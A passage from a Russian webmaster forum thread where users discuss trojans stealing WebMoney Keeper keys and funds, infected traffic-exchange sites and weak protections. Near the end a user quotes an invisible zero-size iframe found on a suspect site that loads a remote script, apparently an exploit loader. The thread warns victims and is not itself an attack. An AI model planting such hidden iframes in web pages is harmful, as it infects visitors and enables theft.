- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Зачем быть уникальным в мире, где все можно скопировать
Почему так важна уникальность текста и как она влияет на SEO
Ingate Organic
Но он заставляет задуматься: а не делают ли разработчики WM то, чего многие из нас давно ждали – подтверждения каждого перевода через Enum?
Оно давно уже сделано в кипер-лайт.
Если подтверждение каждого перевода через Enum можно будет отключить в настройках кипера, то это будет еще одна псевдозащита.
Если троян отправляет хозяину ключи/сертификаты и кражу денег делает человек, а не программа - такая псевдозащита бесполезна.
seamonkey добавил 02.04.2010 в 09:48
,Я неприличные сайты не посещаю :) Позавчера например, когда залез троян, это в основном были блоги манимейкеров 😂
Сами манимейкеры вряд ли трояном награждают. Но есть "замечательные" вирусорассадники, типа систем обмена трафом, напр. lank.ru
В погоне за лишней копейкой манимейкеры запросто могут влепить такую хрень на свой сайт, не подозревая при этом, что распространяют троянов.
Более того некоторые уроды сейчас начали предлагать "партнерские программы" вполне приличным сайтам. Дескать, вы размещаете наш ифрейм, а мы вам за это копеечку платим, Не ведитесь на такие предложения.
Я хотел бы обратить внимание пользователей на новую модификацию этого трояна. В окошке браузера всплывает ошибка «типа» системного процесса, однако дизайн странноват, каспер удачно блокирует его. Но все происходит, как надо…в папке с вебмоней левый файл не появляется. На email ничего не приходит. Кража происходит сразу после смены троем вашего пароля в кипере…
PS: стоит Zver CD v9.9.9 SP3 + KIS 2010. Radmin у меня нет.
Я не осилил всю ветку, но я так понял все случаи краж с Класика, а с Лайт версии крадут? Если да то как?
PS: стоит Zver CD
Дальше можно было не продолжать. Народ, прекратите юродствовать, пользуетесь ломанной-переломанной виндой без обновлений и потом воете о краже бабла. Ну разоритесь вы раз на лицензионную винду (или халявный линукс поставьте), ну хватит позориться... горе-манимейкеры :(
Дальше можно было не продолжать. Народ, прекратите юродствовать, пользуетесь ломанной-переломанной виндой без обновлений и потом воете о краже бабла. Ну разоритесь вы раз на лицензионную винду (или халявный линукс поставьте), ну хватит позориться... горе-манимейкеры :(
Я с этой сборкой много лет (старые версии) работаю, так что доверие к ней есть. Я описал реальную ситуацию, взлом был именно после окошка на 2-й день где-то...Не думаю, что Вам бы помог в таком случае лицензионный WinXP с последними обновлениями.
Я не осилил всю ветку, но я так понял все случаи краж с Класика, а с Лайт версии крадут? Если да то как?
С лайта тырят при использовании для авторизации сертификата "X.чего то там".
Я с этой сборкой много лет (старые версии) работаю, так что доверие к ней есть. Я описал реальную ситуацию, взлом был именно после окошка на 2-й день где-то...Не думаю, что Вам бы помог в таком случае лицензионный WinXP с последними обновлениями.
Есть люди, которые верят, что покупка лицензионного ХР автоматом делает его неуявизвымым для троянов и вирусов. :)
urod.ru скорее всего содержал сплоит, процентов на 90% я уверен что хапнул именно оттуда
добавил......
вот что там висит щас
<noindex><iframe src="http://trfistb.info/for.cgi?tank" width="0" height="0" style="visibility: hidden;"></iframe></noindex>
Нормально?